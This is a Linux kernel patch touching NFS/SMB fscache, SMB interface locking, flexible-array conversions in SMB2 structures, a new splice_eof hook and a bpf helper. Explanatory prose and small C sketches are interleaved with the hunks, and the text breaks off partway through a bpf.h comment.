+index e731c00a9fcbc..d3c938dd2b12a 100644
+--- a/fs/nfs/fscache.c
++++ b/fs/nfs/fscache.c
+@@ -176,6 +176,9 @@ void nfs_fscache_init_inode(struct inode *inode)
+ 					       &auxdata,      /* aux_data */
+ 					       sizeof(auxdata),
+ 					       i_size_read(inode));
++
++	if (netfs_inode(inode)->cache)
++		mapping_set_release_always(inode->i_mapping);
+ }
+ 
+ /*
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 512ac9dea9787..7f1aea4c11b9c 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -972,7 +972,6 @@ release_iface(struct kref *ref)
+ 	struct cifs_server_iface *iface = container_of(ref,
+ 						       struct cifs_server_iface,
+ 						       refcount);
+-	list_del_init(&iface->iface_head);
+ 	kfree(iface);
+ }
+ 
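
With the cifsglob.h change, the kref release callback only frees the interface; unlinking it from ses->iface_list now happens explicitly in parse_server_interfaces() under ses->iface_lock (see the smb2ops.c hunk further down). That appears to be the point: list mutation stays under one lock rather than running wherever the final kref_put() lands. A minimal kref-style sketch of the split:

  #include <stdatomic.h>
  #include <stdlib.h>

  struct iface {
          atomic_int refcount;
          struct iface *next;     /* list linkage, owned by the list lock */
  };

  /* Release only frees; it no longer touches the list. */
  static void iface_release(struct iface *p)
  {
          free(p);
  }

  static void iface_put(struct iface *p)
  {
          if (atomic_fetch_sub(&p->refcount, 1) == 1)
                  iface_release(p);       /* last reference dropped */
  }

  int main(void)
  {
          struct iface *p = malloc(sizeof(*p));

          atomic_init(&p->refcount, 1);
          p->next = NULL;
          /* The caller unlinks under the list lock before this put. */
          iface_put(p);
          return 0;
  }
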
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index f725a119ce312..49fdc6dfdcf8d 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -258,10 +258,13 @@ cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry_safe(ses, nses, &pserver->smb_ses_list, smb_ses_list) {
+ 		/* check if iface is still active */
+-		if (!cifs_chan_is_iface_active(ses, server))
++		spin_lock(&ses->chan_lock);
++		if (!cifs_chan_is_iface_active(ses, server)) {
++			spin_unlock(&ses->chan_lock);
+ 			cifs_chan_update_iface(ses, server);
++			spin_lock(&ses->chan_lock);
++		}
+ 
+-		spin_lock(&ses->chan_lock);
+ 		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
+ 			spin_unlock(&ses->chan_lock);
+ 			continue;
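
The connect.c hunk drops ses->chan_lock around cifs_chan_update_iface() and re-takes it afterwards, presumably because that helper acquires locks of its own; the same drop/call/retake dance appears in the smb2ops.c hunk below. In pthread terms:

  #include <pthread.h>
  #include <stdio.h>

  static pthread_mutex_t chan_lock = PTHREAD_MUTEX_INITIALIZER;

  /* Stand-in for cifs_chan_update_iface(), which must not run with
   * chan_lock held because it takes other locks internally. */
  static void chan_update_iface(void)
  {
          puts("updating interface");
  }

  static void scan_channels(void)
  {
          pthread_mutex_lock(&chan_lock);
          /* ... inspect channel state under the lock ... */
          pthread_mutex_unlock(&chan_lock);   /* drop before nested call */
          chan_update_iface();
          pthread_mutex_lock(&chan_lock);     /* retake and revalidate */
          pthread_mutex_unlock(&chan_lock);
  }

  int main(void)
  {
          scan_channels();
          return 0;
  }
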
+diff --git a/fs/smb/client/fscache.c b/fs/smb/client/fscache.c
+index e73625b5d0cc6..f64bad513ba6d 100644
+--- a/fs/smb/client/fscache.c
++++ b/fs/smb/client/fscache.c
+@@ -108,6 +108,8 @@ void cifs_fscache_get_inode_cookie(struct inode *inode)
+ 				       &cifsi->uniqueid, sizeof(cifsi->uniqueid),
+ 				       &cd, sizeof(cd),
+ 				       i_size_read(&cifsi->netfs.inode));
++	if (cifsi->netfs.cache)
++		mapping_set_release_always(inode->i_mapping);
+ }
+ 
+ void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update)
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 7be51f9d2fa18..5343898bac8a6 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -264,7 +264,7 @@ cifs_unix_basic_to_fattr(struct cifs_fattr *fattr, FILE_UNIX_BASIC_INFO *info,
+ 		fattr->cf_dtype = DT_REG;
+ 		break;
+ 	case UNIX_SYMLINK:
+-		fattr->cf_mode |= S_IFLNK;
++		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
+ 		fattr->cf_dtype = DT_LNK;
+ 		break;
+ 	case UNIX_DIR:
+diff --git a/fs/smb/client/smb2file.c b/fs/smb/client/smb2file.c
+index ba6cc50af390f..a7475bc05cac0 100644
+--- a/fs/smb/client/smb2file.c
++++ b/fs/smb/client/smb2file.c
+@@ -34,7 +34,7 @@ static struct smb2_symlink_err_rsp *symlink_data(const struct kvec *iov)
+ 		len = (u32)err->ErrorContextCount * (offsetof(struct smb2_error_context_rsp,
+ 							      ErrorContextData) +
+ 						     sizeof(struct smb2_symlink_err_rsp));
+-		if (le32_to_cpu(err->ByteCount) < len || iov->iov_len < len + sizeof(*err))
++		if (le32_to_cpu(err->ByteCount) < len || iov->iov_len < len + sizeof(*err) + 1)
+ 			return ERR_PTR(-EINVAL);
+ 
+ 		p = (struct smb2_error_context_rsp *)err->ErrorData;
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index 88942b1fb4318..fdf7a7f188c5f 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -113,7 +113,7 @@ static __u32 get_neg_ctxt_len(struct smb2_hdr *hdr, __u32 len,
+ 	} else if (nc_offset + 1 == non_ctxlen) {
+ 		cifs_dbg(FYI, "no SPNEGO security blob in negprot rsp\n");
+ 		size_of_pad_before_neg_ctxts = 0;
+-	} else if (non_ctxlen == SMB311_NEGPROT_BASE_SIZE)
++	} else if (non_ctxlen == SMB311_NEGPROT_BASE_SIZE + 1)
+ 		/* has padding, but no SPNEGO blob */
+ 		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen + 1;
+ 	else
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index df03d80ab6d5f..4596d2dfdec3a 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -588,16 +588,12 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 	}
+ 
+ 	/*
+-	 * Go through iface_list and do kref_put to remove
+-	 * any unused ifaces. ifaces in use will be removed
+-	 * when the last user calls a kref_put on it
++	 * Go through iface_list and mark them as inactive
+ 	 */
+ 	list_for_each_entry_safe(iface, niface, &ses->iface_list,
+-				 iface_head) {
++				 iface_head)
+ 		iface->is_active = 0;
+-		kref_put(&iface->refcount, release_iface);
+-		ses->iface_count--;
+-	}
++
+ 	spin_unlock(&ses->iface_lock);
+ 
+ 	/*
+@@ -672,10 +668,7 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 					 iface_head) {
+ 			ret = iface_cmp(iface, &tmp_iface);
+ 			if (!ret) {
+-				/* just get a ref so that it doesn't get picked/freed */
+ 				iface->is_active = 1;
+-				kref_get(&iface->refcount);
+-				ses->iface_count++;
+ 				spin_unlock(&ses->iface_lock);
+ 				goto next_iface;
+ 			} else if (ret < 0) {
+@@ -742,6 +735,20 @@ next_iface:
+ 	}
+ 
+ out:
++	/*
++	 * Go through the list again and put the inactive entries
++	 */
++	spin_lock(&ses->iface_lock);
++	list_for_each_entry_safe(iface, niface, &ses->iface_list,
++				 iface_head) {
++		if (!iface->is_active) {
++			list_del(&iface->iface_head);
++			kref_put(&iface->refcount, release_iface);
++			ses->iface_count--;
++		}
++	}
++	spin_unlock(&ses->iface_lock);
++
+ 	return rc;
+ }
+ 
+@@ -778,9 +785,14 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 		goto out;
+ 
+ 	/* check if iface is still active */
++	spin_lock(&ses->chan_lock);
+ 	pserver = ses->chans[0].server;
+-	if (pserver && !cifs_chan_is_iface_active(ses, pserver))
++	if (pserver && !cifs_chan_is_iface_active(ses, pserver)) {
++		spin_unlock(&ses->chan_lock);
+ 		cifs_chan_update_iface(ses, pserver);
++		spin_lock(&ses->chan_lock);
++	}
++	spin_unlock(&ses->chan_lock);
+ 
+ out:
+ 	kfree(out_buf);
+@@ -5752,7 +5764,7 @@ struct smb_version_values smb20_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5774,7 +5786,7 @@ struct smb_version_values smb21_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5795,7 +5807,7 @@ struct smb_version_values smb3any_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5816,7 +5828,7 @@ struct smb_version_values smbdefault_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5837,7 +5849,7 @@ struct smb_version_values smb30_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5858,7 +5870,7 @@ struct smb_version_values smb302_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5879,7 +5891,7 @@ struct smb_version_values smb311_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 05ff8a457a3d7..2dfbf1b23cfa0 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -1386,7 +1386,7 @@ SMB2_sess_sendreceive(struct SMB2_sess_data *sess_data)
+ 
+ 	/* Testing shows that buffer offset must be at location of Buffer[0] */
+ 	req->SecurityBufferOffset =
+-		cpu_to_le16(sizeof(struct smb2_sess_setup_req) - 1 /* pad */);
++		cpu_to_le16(sizeof(struct smb2_sess_setup_req));
+ 	req->SecurityBufferLength = cpu_to_le16(sess_data->iov[1].iov_len);
+ 
+ 	memset(&rqst, 0, sizeof(struct smb_rqst));
+@@ -1905,8 +1905,7 @@ SMB2_tcon(const unsigned int xid, struct cifs_ses *ses, const char *tree,
+ 	iov[0].iov_len = total_len - 1;
+ 
+ 	/* Testing shows that buffer offset must be at location of Buffer[0] */
+-	req->PathOffset = cpu_to_le16(sizeof(struct smb2_tree_connect_req)
+-			- 1 /* pad */);
++	req->PathOffset = cpu_to_le16(sizeof(struct smb2_tree_connect_req));
+ 	req->PathLength = cpu_to_le16(unc_path_len - 2);
+ 	iov[1].iov_base = unc_path;
+ 	iov[1].iov_len = unc_path_len;
+@@ -3796,7 +3795,7 @@ SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
+ 			ses->Suid, (u8)watch_tree, completion_filter);
+ 		/* validate that notify information is plausible */
+ 		if ((rsp_iov.iov_base == NULL) ||
+-		    (rsp_iov.iov_len < sizeof(struct smb2_change_notify_rsp)))
++		    (rsp_iov.iov_len < sizeof(struct smb2_change_notify_rsp) + 1))
+ 			goto cnotify_exit;
+ 
+ 		smb_rsp = (struct smb2_change_notify_rsp *)rsp_iov.iov_base;
+@@ -5009,7 +5008,7 @@ int SMB2_query_directory_init(const unsigned int xid,
+ 	memcpy(bufptr, &asteriks, len);
+ 
+ 	req->FileNameOffset =
+-		cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1);
++		cpu_to_le16(sizeof(struct smb2_query_directory_req));
+ 	req->FileNameLength = cpu_to_le16(len);
+ 	/*
+ 	 * BB could be 30 bytes or so longer if we used SMB2 specific
+@@ -5205,8 +5204,7 @@ SMB2_set_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+ 	req->VolatileFileId = volatile_fid;
+ 	req->AdditionalInformation = cpu_to_le32(additional_info);
+ 
+-	req->BufferOffset =
+-			cpu_to_le16(sizeof(struct smb2_set_info_req) - 1);
++	req->BufferOffset = cpu_to_le16(sizeof(struct smb2_set_info_req));
+ 	req->BufferLength = cpu_to_le32(*size);
+ 
+ 	memcpy(req->Buffer, *data, *size);
+@@ -5440,9 +5438,9 @@ build_qfs_info_req(struct kvec *iov, struct cifs_tcon *tcon,
+ 	req->VolatileFileId = volatile_fid;
+ 	/* 1 for pad */
+ 	req->InputBufferOffset =
+-			cpu_to_le16(sizeof(struct smb2_query_info_req) - 1);
++			cpu_to_le16(sizeof(struct smb2_query_info_req));
+ 	req->OutputBufferLength = cpu_to_le32(
+-		outbuf_len + sizeof(struct smb2_query_info_rsp) - 1);
++		outbuf_len + sizeof(struct smb2_query_info_rsp));
+ 
+ 	iov->iov_base = (char *)req;
+ 	iov->iov_len = total_len;
+diff --git a/fs/smb/client/smb2pdu.h b/fs/smb/client/smb2pdu.h
+index 1237bb86e93a8..a5773a06aba8e 100644
+--- a/fs/smb/client/smb2pdu.h
++++ b/fs/smb/client/smb2pdu.h
+@@ -57,7 +57,7 @@ struct smb2_rdma_crypto_transform {
+ #define COMPOUND_FID 0xFFFFFFFFFFFFFFFFULL
+ 
+ #define SMB2_SYMLINK_STRUCT_SIZE \
+-	(sizeof(struct smb2_err_rsp) - 1 + sizeof(struct smb2_symlink_err_rsp))
++	(sizeof(struct smb2_err_rsp) + sizeof(struct smb2_symlink_err_rsp))
+ 
+ #define SYMLINK_ERROR_TAG 0x4c4d5953
+ 
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 07549957b3099..5593bb49954c6 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -189,7 +189,7 @@ struct smb2_err_rsp {
+ 	__u8   ErrorContextCount;
+ 	__u8   Reserved;
+ 	__le32 ByteCount;  /* even if zero, at least one byte follows */
+-	__u8   ErrorData[1];  /* variable length */
++	__u8   ErrorData[];  /* variable length */
+ } __packed;
+ 
+ #define SMB3_AES_CCM_NONCE 11
+@@ -330,7 +330,7 @@ struct smb2_tree_connect_req {
+ 	__le16 Flags;		/* Flags in SMB3.1.1 */
+ 	__le16 PathOffset;
+ 	__le16 PathLength;
+-	__u8   Buffer[1];	/* variable length */
++	__u8   Buffer[];	/* variable length */
+ } __packed;
+ 
+ /* Possible ShareType values */
+@@ -617,7 +617,7 @@ struct smb2_negotiate_rsp {
+ 	__le16 SecurityBufferOffset;
+ 	__le16 SecurityBufferLength;
+ 	__le32 NegotiateContextOffset;	/* Pre:SMB3.1.1 was reserved/ignored */
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
++	__u8   Buffer[];	/* variable length GSS security buffer */
+ } __packed;
+ 
+ 
+@@ -638,7 +638,7 @@ struct smb2_sess_setup_req {
+ 	__le16 SecurityBufferOffset;
+ 	__le16 SecurityBufferLength;
+ 	__le64 PreviousSessionId;
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
++	__u8   Buffer[];	/* variable length GSS security buffer */
+ } __packed;
+ 
+ /* Currently defined SessionFlags */
+@@ -655,7 +655,7 @@ struct smb2_sess_setup_rsp {
+ 	__le16 SessionFlags;
+ 	__le16 SecurityBufferOffset;
+ 	__le16 SecurityBufferLength;
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
++	__u8   Buffer[];	/* variable length GSS security buffer */
+ } __packed;
+ 
+ 
+@@ -737,7 +737,7 @@ struct smb2_read_req {
+ 	__le32 RemainingBytes;
+ 	__le16 ReadChannelInfoOffset;
+ 	__le16 ReadChannelInfoLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ /* Read flags */
+@@ -752,7 +752,7 @@ struct smb2_read_rsp {
+ 	__le32 DataLength;
+ 	__le32 DataRemaining;
+ 	__le32 Flags;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ 
+@@ -776,7 +776,7 @@ struct smb2_write_req {
+ 	__le16 WriteChannelInfoOffset;
+ 	__le16 WriteChannelInfoLength;
+ 	__le32 Flags;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct smb2_write_rsp {
+@@ -787,7 +787,7 @@ struct smb2_write_rsp {
+ 	__le32 DataLength;
+ 	__le32 DataRemaining;
+ 	__u32  Reserved2;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ 
+@@ -834,7 +834,10 @@ struct smb2_lock_req {
+ 	__u64  PersistentFileId;
+ 	__u64  VolatileFileId;
+ 	/* Followed by at least one */
+-	struct smb2_lock_element locks[1];
++	union {
++		struct smb2_lock_element lock;
++		DECLARE_FLEX_ARRAY(struct smb2_lock_element, locks);
++	};
+ } __packed;
+ 
+ struct smb2_lock_rsp {
+@@ -888,7 +891,7 @@ struct smb2_query_directory_req {
+ 	__le16 FileNameOffset;
+ 	__le16 FileNameLength;
+ 	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct smb2_query_directory_rsp {
+@@ -896,7 +899,7 @@ struct smb2_query_directory_rsp {
+ 	__le16 StructureSize; /* Must be 9 */
+ 	__le16 OutputBufferOffset;
+ 	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ /*
+@@ -919,7 +922,7 @@ struct smb2_set_info_req {
+ 	__le32 AdditionalInformation;
+ 	__u64  PersistentFileId;
+ 	__u64  VolatileFileId;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct smb2_set_info_rsp {
+@@ -974,7 +977,7 @@ struct smb2_change_notify_rsp {
+ 	__le16	StructureSize;  /* Must be 9 */
+ 	__le16	OutputBufferOffset;
+ 	__le32	OutputBufferLength;
+-	__u8	Buffer[1]; /* array of file notify structs */
++	__u8	Buffer[]; /* array of file notify structs */
+ } __packed;
+ 
+ 
+@@ -1180,7 +1183,7 @@ struct smb2_create_rsp {
+ 	__u64  VolatileFileId;
+ 	__le32 CreateContextsOffset;
+ 	__le32 CreateContextsLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct create_posix {
+@@ -1524,7 +1527,7 @@ struct smb2_query_info_req {
+ 	__le32 Flags;
+ 	__u64  PersistentFileId;
+ 	__u64  VolatileFileId;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct smb2_query_info_rsp {
+@@ -1532,7 +1535,7 @@ struct smb2_query_info_rsp {
+ 	__le16 StructureSize; /* Must be 9 */
+ 	__le16 OutputBufferOffset;
+ 	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ /*
+@@ -1593,7 +1596,10 @@ struct smb2_file_all_info { /* data block encoding of response to level 18 */
+ 	__le32 Mode;
+ 	__le32 AlignmentRequirement;
+ 	__le32 FileNameLength;
+-	char   FileName[1];
++	union {
++		char __pad;	/* Legacy structure padding */
++		DECLARE_FLEX_ARRAY(char, FileName);
++	};
+ } __packed; /* level 18 Query */
+ 
+ struct smb2_file_eof_info { /* encoding of request for level 10 */
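/*
 * Two shapes recur in the one-element-array conversions above. Plain
 * trailing buffers become C99 flexible arrays ("__u8 Buffer[]"), which is
 * why the many "sizeof(...) - 1" adjustments elsewhere in this patch go
 * away. Where the legacy wire size must survive, as in smb2_file_all_info,
 * the flex array is wrapped in a union with a one-byte pad;
 * DECLARE_FLEX_ARRAY() exists because a bare flexible array may not sit
 * directly inside a union. A freestanding sketch of that second shape:
 */
struct demo {
	unsigned int FileNameLength;
	union {
		char __pad;			/* preserves the legacy sizeof() */
		struct {
			struct { } __empty;	/* roughly what DECLARE_FLEX_ARRAY() expands to */
			char FileName[];
		};
	};
} __attribute__((packed));

/* sizeof(struct demo) == 5, identical to the old "char FileName[1]" layout. */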
+diff --git a/fs/smb/server/smb2ops.c b/fs/smb/server/smb2ops.c
+index 535402629655e..27a9dce3e03ab 100644
+--- a/fs/smb/server/smb2ops.c
++++ b/fs/smb/server/smb2ops.c
+@@ -26,7 +26,7 @@ static struct smb_version_values smb21_server_values = {
+ 	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -52,7 +52,7 @@ static struct smb_version_values smb30_server_values = {
+ 	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -79,7 +79,7 @@ static struct smb_version_values smb302_server_values = {
+ 	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -106,7 +106,7 @@ static struct smb_version_values smb311_server_values = {
+ 	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index ea48dd06d4da3..6e5ed0ac578a6 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -294,8 +294,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY)
+ 		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+ 	err = ksmbd_iov_pin_rsp(work, rsp,
+-				sizeof(struct smb2_negotiate_rsp) -
+-				sizeof(rsp->Buffer) + AUTH_GSS_LENGTH);
++				sizeof(struct smb2_negotiate_rsp) + AUTH_GSS_LENGTH);
+ 	if (err)
+ 		return err;
+ 	conn->use_spnego = true;
+@@ -1263,9 +1262,8 @@ err_out:
+ 
+ 	if (!rc)
+ 		rc = ksmbd_iov_pin_rsp(work, rsp,
+-				       sizeof(struct smb2_negotiate_rsp) -
+-					sizeof(rsp->Buffer) +
+-					AUTH_GSS_LENGTH + neg_ctxt_len);
++				       sizeof(struct smb2_negotiate_rsp) +
++				       AUTH_GSS_LENGTH + neg_ctxt_len);
+ 	if (rc < 0)
+ 		smb2_set_err_rsp(work);
+ 	return rc;
+diff --git a/fs/splice.c b/fs/splice.c
+index 5969b7a1d353a..d0230cf8ec571 100644
+--- a/fs/splice.c
++++ b/fs/splice.c
+@@ -65,8 +65,7 @@ static bool page_cache_pipe_buf_try_steal(struct pipe_inode_info *pipe,
+ 		 */
+ 		folio_wait_writeback(folio);
+ 
+-		if (folio_has_private(folio) &&
+-		    !filemap_release_folio(folio, GFP_KERNEL))
++		if (!filemap_release_folio(folio, GFP_KERNEL))
+ 			goto out_unlock;
+ 
+ 		/*
+@@ -764,6 +763,17 @@ static long do_splice_from(struct pipe_inode_info *pipe, struct file *out,
+ 	return out->f_op->splice_write(pipe, out, ppos, len, flags);
+ }
+ 
++/*
++ * Indicate to the caller that there was a premature EOF when reading from the
++ * source and the caller didn't indicate they would be sending more data after
++ * this.
++ */
++static void do_splice_eof(struct splice_desc *sd)
++{
++	if (sd->splice_eof)
++		sd->splice_eof(sd);
++}
++
+ /*
+  * Attempt to initiate a splice from a file to a pipe.
+  */
+@@ -864,7 +874,7 @@ ssize_t splice_direct_to_actor(struct file *in, struct splice_desc *sd,
+ 
+ 		ret = do_splice_to(in, &pos, pipe, len, flags);
+ 		if (unlikely(ret <= 0))
+-			goto out_release;
++			goto read_failure;
+ 
+ 		read_len = ret;
+ 		sd->total_len = read_len;
+@@ -904,6 +914,15 @@ done:
+ 	file_accessed(in);
+ 	return bytes;
+ 
++read_failure:
++	/*
++	 * If the user did *not* set SPLICE_F_MORE *and* we didn't hit that
++	 * "use all of len" case that cleared SPLICE_F_MORE, *and* we did a
++	 * "->splice_in()" that returned EOF (ie zero) *and* we have sent at
++	 * least 1 byte *then* we will also do the ->splice_eof() call.
++	 */
++	if (ret == 0 && !more && len > 0 && bytes)
++		do_splice_eof(sd);
+ out_release:
+ 	/*
+ 	 * If we did an incomplete transfer we must release
+@@ -932,6 +951,14 @@ static int direct_splice_actor(struct pipe_inode_info *pipe,
+ 			      sd->flags);
+ }
+ 
++static void direct_file_splice_eof(struct splice_desc *sd)
++{
++	struct file *file = sd->u.file;
++
++	if (file->f_op->splice_eof)
++		file->f_op->splice_eof(file);
++}
++
+ /**
+  * do_splice_direct - splices data directly between two files
+  * @in:		file to splice from
+@@ -957,6 +984,7 @@ long do_splice_direct(struct file *in, loff_t *ppos, struct file *out,
+ 		.flags		= flags,
+ 		.pos		= *ppos,
+ 		.u.file		= out,
++		.splice_eof	= direct_file_splice_eof,
+ 		.opos		= opos,
+ 	};
+ 	long ret;
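/*
 * Call-chain sketch for the new hook: when splice_direct_to_actor() hits a
 * premature EOF it invokes sd->splice_eof() (direct_file_splice_eof here),
 * which forwards to file->f_op->splice_eof(); for a socket file that is
 * expected to land in sock->ops->splice_eof() and finally a protocol
 * handler such as tcp_splice_eof(). The socket-layer glue would look
 * roughly like this (a sketch, not a hunk from this patch):
 */
static void sock_splice_eof(struct file *file)
{
	struct socket *sock = file->private_data;

	if (sock->ops->splice_eof)
		sock->ops->splice_eof(sock);	/* e.g. inet_splice_eof() */
}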
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 3ce9e39ecdb85..ba22cf4f5fc0e 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -702,10 +702,14 @@ bpf_ctx_record_field_size(struct bpf_insn_access_aux *aux, u32 size)
+ 	aux->ctx_field_size = size;
+ }
+ 
++static bool bpf_is_ldimm64(const struct bpf_insn *insn)
++{
++	return insn->code == (BPF_LD | BPF_IMM | BPF_DW);
++}
++
+ static inline bool bpf_pseudo_func(const struct bpf_insn *insn)
+ {
+-	return insn->code == (BPF_LD | BPF_IMM | BPF_DW) &&
+-	       insn->src_reg == BPF_PSEUDO_FUNC;
++	return bpf_is_ldimm64(insn) && insn->src_reg == BPF_PSEUDO_FUNC;
+ }
+ 
+ struct bpf_prog_ops {
+@@ -825,6 +829,11 @@ struct btf_func_model {
+  */
+ #define BPF_TRAMP_F_SHARE_IPMODIFY	BIT(6)
+ 
++/* Indicate that current trampoline is in a tail call context. Then, it has to
++ * cache and restore tail_call_cnt to avoid infinite tail call loop.
